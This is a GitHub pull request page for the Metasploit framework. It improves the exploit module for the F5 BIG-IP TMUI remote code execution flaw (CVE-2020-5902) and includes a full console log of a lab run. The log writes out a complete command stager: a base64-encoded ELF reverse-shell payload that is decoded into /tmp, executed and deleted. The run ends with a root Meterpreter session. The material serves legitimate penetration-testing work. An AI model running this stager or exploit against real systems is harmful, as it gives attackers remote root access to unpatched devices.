Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Improve robustness of exploit/linux/http/f5_bigip_tmui_rce (CVE-2020-5902) #13854

Merged
merged 3 commits into from
Jul 20, 2020
Merged

Improve robustness of exploit/linux/http/f5_bigip_tmui_rce (CVE-2020-5902) #13854

merged 3 commits into from
Jul 20, 2020

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Jul 17, 2020
edited
Loading

Here are some improvements that didn't make the deadline.

What's strange is that if the stars align, like if the system has been "used" enough, the exploit is incredibly reliable. Maybe my test environment is bonkers. In any case, I'm dropping the rank for the worst case.

msf5 exploit(linux/http/f5_bigip_tmui_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[-] Alias "list" already exists, deleting it
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwQ+QFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/wCkkU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/whuIi' < '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'"]
[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwQ+QFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/wCkkU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/whuIi' < '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'
[*] Uploading /tmp/WuyGIfbP
[+] Successfully uploaded /tmp/WuyGIfbP
[*] Executing /tmp/WuyGIfbP
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012516 bytes) to 172.16.249.179
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.179:55118) at 2020-07-17 06:06:38 -0500
[+] Deleted /tmp/WuyGIfbP
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash

meterpreter > getuid
Server username: no-user @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.3.1611 (Linux 3.10.0-514.26.2.el7.ve.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Updates #13807.

@wvu
Improve robustness by refactoring error handling
1ae689c 
tmshCmd.jsp is extremely unreliable!
@wvu wvu mentioned this pull request Jul 17, 2020
Merged
wvu added 2 commits July 17, 2020 06:10
@wvu
Make Meterpreter the default target
c082ccd
@wvu
Update TMSH escape reliability notes
d5d4716 
What's strange is that if the stars align, like if the system has been
"used" enough, the exploit is incredibly reliable. Maybe my test
environment is bonkers.
@wvu wvu requested a review from smcintyre-r7 July 17, 2020 11:49
@wvu wvu removed the request for review from smcintyre-r7 July 20, 2020 15:11
@wvu wvu self-assigned this Jul 20, 2020
@wvu wvu merged commit 6211fea into rapid7:master Jul 20, 2020
@wvu
Copy link
Contributor Author

wvu commented Jul 20, 2020
edited by pbarry-r7
Loading

Release Notes

Improved the robustness of the exploit/linux/http/f5_bigip_tmui_rce module (CVE-2020-5902) and set Meterpreter as the default payload type.

@wvu wvu deleted the feature/f5 branch July 20, 2020 15:23
@pbarry-r7 pbarry-r7 added the rn-enhancement release notes enhancement label Aug 5, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wvu wvu

Labels
docs enhancement module rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@wvu @pbarry-r7